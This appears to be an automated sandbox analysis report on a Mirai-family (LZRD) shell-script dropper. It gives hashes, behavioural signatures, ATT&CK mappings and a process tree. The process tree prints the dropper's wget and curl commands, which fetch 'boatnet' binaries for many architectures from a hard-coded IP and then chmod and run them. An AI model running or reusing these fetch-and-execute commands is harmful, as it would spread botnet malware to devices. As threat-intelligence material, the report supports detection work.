Analysis
-
max time kernel
149s -
max time network
146s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
26-01-2025 03:58
Static task
static1
Behavioral task
behavioral1
Sample
c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh
-
Size
2KB
-
MD5
17dd5d8084206f6fc1220c00f306c8a7
-
SHA1
f5a1e23a8ec3c955a188c5f0e8487323046589bb
-
SHA256
c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee
-
SHA512
39bc89258fa7fd88b67e530d7f2b0a65aacfaf4c93c102bddc9e4bfafbe5b9f5047a3ab54ca05feade7398a2a52be1c59ce29241ab1093f2f0de331c0106600a
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 707 chmod 729 chmod 779 chmod 806 chmod 823 chmod 853 chmod 694 chmod 714 chmod 753 chmod 765 chmod 794 chmod 814 chmod 839 chmod 720 chmod 740 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 695 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 708 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 715 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 721 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 730 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 741 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 754 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 766 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 780 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 795 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 807 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 815 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 824 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 840 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh /tmp/WTF 854 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 4 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx -
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/664/cmdline WTF File opened for reading /proc/784/cmdline WTF File opened for reading /proc/877/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/448/cmdline WTF File opened for reading /proc/798/cmdline WTF File opened for reading /proc/875/cmdline WTF File opened for reading /proc/770/cmdline WTF File opened for reading /proc/843/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/875/cmdline WTF File opened for reading /proc/871/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/835/cmdline WTF File opened for reading /proc/887/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/670/cmdline WTF File opened for reading /proc/801/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/810/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/404/cmdline WTF File opened for reading /proc/666/cmdline WTF File opened for reading /proc/665/cmdline WTF File opened for reading /proc/749/cmdline WTF File opened for reading /proc/789/cmdline WTF File opened for reading /proc/830/cmdline WTF File opened for reading /proc/871/cmdline WTF File opened for reading /proc/879/cmdline WTF File opened for reading /proc/842/cmdline WTF File opened for reading /proc/873/cmdline WTF File opened for reading /proc/844/cmdline WTF File opened for reading /proc/883/cmdline WTF File opened for reading /proc/821/cmdline WTF File opened for reading /proc/770/cmdline WTF File opened for reading /proc/797/cmdline WTF File opened for reading /proc/667/cmdline WTF File opened for reading /proc/697/cmdline WTF File opened for reading /proc/665/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/670/cmdline WTF File opened for reading /proc/768/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/749/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/811/cmdline WTF File opened for reading /proc/622/cmdline WTF File opened for reading /proc/622/cmdline WTF File opened for reading /proc/883/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTF File opened for reading /proc/861/cmdline WTF File opened for reading /proc/887/cmdline WTF File opened for reading /proc/808/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/838/cmdline WTF File opened for reading /proc/self/exe WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 699 wget 702 curl 706 cat -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/WTF c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.sh4 curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.arc curl
Processes
-
/tmp/c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh/tmp/c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:667 -
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:672
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.x862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:683
-
-
/bin/catcat boatnet.x862⤵PID:692
-
-
/bin/chmodchmod +x boatnet.x86 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/WTF./WTF2⤵PID:695
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:699
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:702
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:706
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:707
-
-
/tmp/WTF./WTF2⤵PID:708
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:710
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:712
-
-
/bin/catcat boatnet.arc2⤵PID:713
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/WTF./WTF2⤵PID:715
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.i4682⤵PID:717
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/catcat boatnet.i4682⤵PID:719
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/WTF./WTF2⤵PID:721
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.i6862⤵PID:722
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/catcat boatnet.i6862⤵PID:728
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/WTF./WTF2⤵PID:730
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.x86_642⤵PID:732
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/catcat boatnet.x86_642⤵PID:739
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/WTF./WTF2⤵PID:741
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:742
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.mpsl2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:745
-
-
/bin/catcat boatnet.mpsl2⤵PID:751
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/WTF./WTF2⤵PID:754
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:756
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/catcat boatnet.arm2⤵PID:764
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/WTF./WTF2⤵
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:766
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:771
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/catcat boatnet.arm52⤵PID:778
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/WTF./WTF2⤵PID:780
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:781
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.arm62⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:786
-
-
/bin/catcat boatnet.arm62⤵PID:793
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/WTF./WTF2⤵PID:795
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:797
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/catcat boatnet.arm72⤵PID:804
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/WTF./WTF2⤵
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:807
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:811
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/catcat boatnet.ppc2⤵PID:813
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-wA7FyE WTF2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/WTF./WTF2⤵PID:815
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:817
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/catcat boatnet.spc2⤵PID:822
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh WTF2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/WTF./WTF2⤵PID:824
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:827
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/catcat boatnet.m68k2⤵PID:837
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh WTF2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/WTF./WTF2⤵PID:840
-
-
/usr/bin/wgetwget http://154.62.226.5/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:842
-
-
/usr/bin/curlcurl -O http://154.62.226.5/hiddenbin/boatnet.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/catcat boatnet.sh42⤵PID:851
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 c2714ff4ee98f85de0bb1db36fe0686bd252712fb57eddc3feb4638903c288ee.sh WTF2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/WTF./WTF2⤵PID:854
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD5a707c2e2633e0a7e1802bc418d61cff7
SHA141bda3be4058fe487cec6ccd716354d4c5fb6e16
SHA2565366ef37d482d37f05ed7b3138b83579dd35c0a47e21bf5df63c9a7b24be40ac
SHA51261eb40201080dbc1cc649197a0be1d781c082e92014ae4383bd6a5d5f55a3fa1887f17359a40116849e5e97c97c9d0c0b2a818250437ddac17c93d7ea0f98f8d
-
Filesize
105KB
MD5472d4d75d8483fc824eb0911b4c35cad
SHA1dec4becfa3f99006d6af3b64efd0dcbd58e46174
SHA256c9d1873aac242b154ee98234fda07a10e4fcd3f91fe0f1c6a9d9eebdbfceddf9
SHA512ff76fd61dd6bbae41ce5fe1d346975a44bfc339c50c5f58b0a7eee42c041bdad7bc4bd63cffa35326a0ac53362eba07bdfe6b36cd64af1a0d9d7bc03dad17e2e
-
Filesize
220B
MD5f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1750274b02d5f5b00026a4f55b020f4285c693533
SHA256219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA51236bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259
-
Filesize
220B
MD5a8f502a6fb3b7b940e922c951d9e493a
SHA1fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338
-
Filesize
57KB
MD50fb4998f9591c180f42880840eff18a6
SHA1615524375f2333da6f4e16e8da6d0954261f7f2d
SHA2568f32360b655bb39a1e4a2dc1d6d018da9e18714ac36192f1b9976dceb4baef42
SHA512705b676abe24a66dfe7307b3e1c320442dcc7f68f068f5fe9b6ea3b26997854d28e48fb094dc10f0d5522fe4e525858772ab8f75aefd08f8cb27d4587daffb97
-
Filesize
20KB
MD5fe554c823518892cc1b87337370a3211
SHA1b605736332547cf5a8e4a62c768e2f6ea2eaa765
SHA256d8f3b3cd5de4a9bfd20c3de51b11620399077c6b368e99229638f8c9f80bcf49
SHA51298882754405039d2d997bb82d733398cb85c38866eac26fe830a02d50e9f1319489e2940eed73f6c240430c8fdad98dc5a2f9be831a84a8813600785db327fc8